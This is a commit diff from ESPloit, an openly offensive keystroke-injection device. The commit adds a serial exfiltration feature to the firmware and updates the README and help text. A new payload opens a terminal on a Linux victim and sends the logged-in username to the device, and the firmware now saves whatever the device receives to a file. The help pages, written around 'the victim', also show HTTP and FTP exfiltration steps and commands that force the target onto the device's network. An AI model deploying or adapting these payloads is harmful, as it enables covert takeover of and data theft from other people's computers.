Release 2.7.331

Add Serial Exfiltration Method Victim and Device no longer need to be on the same network to exfiltrate data!
exploitagency · Oct 22, 2017 · 9f877f4 · 9f877f4
1 parent 804c63f
commit 9f877f4
Show file tree

Hide file tree

Showing 7 changed files with 65 additions and 14 deletions.
diff --git a/README.md b/README.md
@@ -70,7 +70,9 @@ You are now greeted with the main menu of ESPloit. From here there are several o
 Upload Payload: Upload a payload.txt file  
 Choose Payload: Choose a payload to run  
 Live Payload Mode: Type out or copy/paste a payload to run without uploading  
+Duckuino Mode: Convert and optionally run Ducky Script payloads to ESPloit compatible script  
 Input Mode: Use the device as a keyboard/mouse substitute  
+List Exfiltrated Data: Lists any exfiltrated data  
 Configure ESPloit: Configure WiFi and basic settings  
 Format File System: Format the file system  
 Upgrade ESPloit Firmware: Upgrade the ESP-12S ESPloit firmware from a web browser  
@@ -236,16 +238,24 @@ Live Payload Mode
 Here you may type out or copy/paste a payload to run without uploading.  
 
 -----  
-List Exfiltrated Data  
+Input Mode  
 -----  
 
-Displays any data that has been collected from the victim using ESPloit's exfiltration methods.  
+Use the device as a keyboard/mouse substitute.  
+
+-----  
+Duckuino Mode  
+-----  
+
+Convert Ducky Script to ESPloit Script and then optionally run the script.  
+Paste Ducky Script on the text area to the left.  
+Click convert and the ESPloit compatible script appears on the right.  
 
 -----  
-Input Mode  
+List Exfiltrated Data  
 -----  
 
-Use the device as a keyboard/mouse substitute.  
+Displays any data that has been collected from the victim using ESPloit's exfiltration methods.  
 
 -----  
 Format File System  
@@ -275,7 +285,15 @@ If you are using this mode to swap the firmware loaded on the ESP-12S chip, and
 Exfiltrating Data  
 -----  
 
-To exfiltrate data be sure ESPloit and Target machine are on the same network.  
+Serial Exfiltration Method:  
+Find the victims com port  
+Set the baud rate to 38400  
+Send the text "SerialEXFIL:" followed by the data to exfiltrate  
+Exfiltrated data will be saved to the file SerialEXFIL.txt  
+See the example payloads for more info  
+
+WiFi Exfiltration Methods:  
+To exfiltrate data using WiFi methods be sure ESPloit and Target machine are on the same network.  
 Either set ESPloit to join the Target's network or set the Target to join ESPloit's AP.  
 
 Example commands to force victim to connect to ESPloit's network(when set as AP):  

diff --git a/payloads/LinSerialEXFIL.txt b/payloads/LinSerialEXFIL.txt
@@ -0,0 +1,5 @@
+Rem: Exfiltrate UserName from Linux Box using a Serial Link
+Press:134+195
+PrintLine:gnome-terminal
+CustomDelay:1000
+PrintLine:stty -F /dev/ttyACM0 38400;echo "SerialEXFIL:"$(whoami) > /dev/ttyACM0
diff --git a/source/ESP_Code/Duckuino.h b/source/ESP_Code/Duckuino.h
@@ -102,6 +102,9 @@ menu a.hoverable:hover {
 <body>
 <menu>
 <FORM action="/runlivepayload" method="post" id="duckuino" target="iframe">
+<a class="left hoverable" href="/esploit">
+<- BACK
+</a>
 <a class="left compile-but hoverable">
 Convert
 </a>
@@ -112,7 +115,7 @@ Run Payload
 <div class="inout-wrapper">
 <textarea class="inout duckyscript" placeholder="Enter Ducky Script Here"></textarea>
 <INPUT type="radio" name="livepayloadpresent" value="1" hidden="1" checked="checked">
-<textarea class="inout arduino" name="livepayload" readonly placeholder="ESPloit Compatible Script will Appear Here (Click Convert)"></textarea>
+<textarea class="inout arduino" name="livepayload" readonly placeholder="ESPloit Compatible Script will Appear Here (Click Convert then optionally Run Payload)"></textarea>
 </form>
 </div>
 <textarea class="console" readonly></textarea>

diff --git a/source/ESP_Code/ESP_Code.ino b/source/ESP_Code/ESP_Code.ino
@@ -604,7 +604,7 @@ void ListPayloads(){
   String FileList = "<a href=\"/esploit\"><- BACK TO INDEX</a><br><br>";
   Dir dir = SPIFFS.openDir(directory);
   if(server.uri() == "/listpayloads") FileList += "File System Info Calculated in Bytes<br><b>Total:</b> "+total+" <b>Free:</b> "+freespace+" "+" <b>Used:</b> "+used+"<br><br><a href=\"/uploadpayload\">Upload Payload</a><br><br><a href=\"/livepayload\">Live Payload Mode</a><br><br><table border='1'><tr><td><b>Display Payload Contents</b></td><td><b>Size in Bytes</b></td><td><b>Run Payload</b></td><td><b>Download File</b></td><td><b>Delete Payload</b></td></tr>";
-  if(server.uri() == "/exfiltrate/list") FileList += String()+F("To exfiltrate data be sure ESPloit and Target machine are on the same network.<br>Either set ESPloit to join the Target's network or set the Target to join ESPloit's AP.<br><small>Current Network Configuration: ESPloit's IP= <b>")+local_IPstr+"</b> SSID = <b>"+ssid+"</b> PASSWORD = <b>"+password+"</b><br>Windows: netsh wlan set hostednetwork mode=allow ssid=\"<b>"+ssid+"</b>\" key=\"<b>"+password+"</b>\"<br>Linux: nmcli dev wifi connect <b>"+ssid+"</b> password <b>"+password+"</b></small><br>For HTTP exfiltration method point the target machine to the url listed below:<br><small>http://<b>"+local_IPstr+"</b>/exfiltrate?file=<b>FILENAME.TXT</b>&data=<b>EXFILTRATED-DATA-HERE</b></small><br>For FTP exfiltration method use the credentials listed below:<br><small>Server: <b>"+local_IPstr+"</b> Username: <b>"+ftp_username+"</b> Password: <b>"+ftp_password+"</b></small><br>See the example payloads for more in depth examples.<br><br>File System Info Calculated in Bytes<br><b>Total:</b> "+total+" <b>Free:</b> "+freespace+" "+" <b>Used:</b> "+used+"<br><br><table border='1'><tr><td><b>Display File Contents</b></td><td><b>Size in Bytes</b></td><td><b>Download File</b></td><td><b>Delete File</b></td></tr>";
+  if(server.uri() == "/exfiltrate/list") FileList += String()+F("To exfiltrate data using the serial method find the com port device is connected to<br>then be sure to set the baud rate to 38400 on the victim machine<br>and send the text \"SerialEXFIL:\" followed by the data to exfiltrate.<br>To exfiltrate data using the WiFi methods be sure ESPloit and Target machine are on the same network.<br>Either set ESPloit to join the Target's network or set the Target to join ESPloit's AP.<br><small>Current Network Configuration: ESPloit's IP= <b>")+local_IPstr+"</b> SSID = <b>"+ssid+"</b> PASSWORD = <b>"+password+"</b><br>Windows: netsh wlan set hostednetwork mode=allow ssid=\"<b>"+ssid+"</b>\" key=\"<b>"+password+"</b>\"<br>Linux: nmcli dev wifi connect <b>"+ssid+"</b> password <b>"+password+"</b></small><br>For HTTP exfiltration method point the target machine to the url listed below:<br><small>http://<b>"+local_IPstr+"</b>/exfiltrate?file=<b>FILENAME.TXT</b>&data=<b>EXFILTRATED-DATA-HERE</b></small><br>For FTP exfiltration method use the credentials listed below:<br><small>Server: <b>"+local_IPstr+"</b> Username: <b>"+ftp_username+"</b> Password: <b>"+ftp_password+"</b></small><br>See the example payloads for more in depth examples.<br><br>File System Info Calculated in Bytes<br><b>Total:</b> "+total+" <b>Free:</b> "+freespace+" "+" <b>Used:</b> "+used+"<br><br><table border='1'><tr><td><b>Display File Contents</b></td><td><b>Size in Bytes</b></td><td><b>Download File</b></td><td><b>Delete File</b></td></tr>";
   while (dir.next()) {
     String FileName = dir.fileName();
     File f = dir.openFile("r");
@@ -1162,7 +1162,14 @@ void loop() {
         if(cmd == "Version"){
           ardversion = Serial.readStringUntil('\n');
         }
+        if(cmd == "SerialEXFIL"){
+          String SerialEXFIL = Serial.readStringUntil('\n');
+          File f = SPIFFS.open("/SerialEXFIL.txt", "a");
+          f.println(SerialEXFIL);
+          f.close();
+        }
   }
+
   //Serial.print("Free heap-");
   //Serial.println(ESP.getFreeHeap(),DEC);
 }
diff --git a/source/ESP_Code/ESP_Code.ino.generic.bin b/source/ESP_Code/ESP_Code.ino.generic.bin
diff --git a/source/ESP_Code/HelpText.h b/source/ESP_Code/HelpText.h
@@ -74,7 +74,9 @@ Upload Payload: Upload a payload.txt file<br>
 Choose Payload: Choose a payload to run<br>
 Live Payload Mode: Type out or copy/paste a payload to run without uploading<br>
 Input Mode: Use the device as a keyboard/mouse substitute<br>
+Duckuino Mode: Convert and optionally run Ducky Script payloads to ESPloit compatible script<br>
 Configure ESPloit: Configure WiFi and basic settings<br>
+List Exfiltrated Data: Lists any exfiltrated data<br>
 Format File System: Format the file system<br>
 Upgrade ESPloit Firmware: Upgrade the ESP-12S ESPloit firmware from a web browser<br>
 Help: Brings up this help file<br>
@@ -144,7 +146,7 @@ Scripting a Payload<br>
 -----<br>
 <br>
 ESPloit uses its own scripting language and not Ducky Script,<br>
-although a Ducky Script to ESPloit converter is available at: https://exploitagency.github.io/Duckuino/index.html<br>
+although a Ducky Script to ESPloit converter is available in the Duckuino Mode page<br>
 <br>
 Examples of ESPloit's scripting language can be seen below.<br>
 <br>
@@ -239,16 +241,24 @@ Live Payload Mode<br>
 Here you may type out or copy/paste a payload to run without uploading.<br>
 <br>
 -----<br>
-List Exfiltrated Data<br>
+Input Mode<br>
 -----<br>
 <br>
-Displays any data that has been collected from the victim using ESPloit's exfiltration methods.<br>
+Use the device as a keyboard/mouse substitute.<br>
 <br>
 -----<br>
-Input Mode<br>
+Duckuino Mode<br>
 -----<br>
 <br>
-Use the device as a keyboard/mouse substitute.<br>
+Convert Ducky Script to ESPloit Script and then optionally run the script.<br>
+Paste Ducky Script on the text area to the left.<br>
+Click convert and the ESPloit compatible script appears on the right.<br>
+<br>
+-----<br>
+List Exfiltrated Data<br>
+-----<br>
+<br>
+Displays any data that has been collected from the victim using ESPloit's exfiltration methods.<br>
 <br>
 -----<br>
 Format File System<br>
@@ -278,7 +288,15 @@ If you are using this mode to swap the firmware loaded on the ESP-12S chip, and
 Exfiltrating Data<br>
 -----<br>
 <br>
-To exfiltrate data be sure ESPloit and Target machine are on the same network.<br>
+Serial Exfiltration Method:<br>
+Find the victims com port<br>
+Set the baud rate to 38400 on victim machine<br>
+Send the text "SerialEXFIL:" followed by the data to exfiltrate<br>
+Exfiltrated data will be saved to the file SerialEXFIL.txt<br>
+See the example payloads for more info<br>
+<br>
+WiFi Exfiltration Methods:<br>
+To exfiltrate data using WiFi methods be sure ESPloit and Target machine are on the same network.<br>
 Either set ESPloit to join the Target's network or set the Target to join ESPloit's AP.<br>
 <br>
 Example commands to force victim to connect to ESPloit's network(when set as AP):<br>

diff --git a/source/ESP_Code/version.h b/source/ESP_Code/version.h
@@ -1,2 +1,2 @@
-String version = "2.6.1337";
+String version = "2.7.331";
 String latestardversion = "2.2";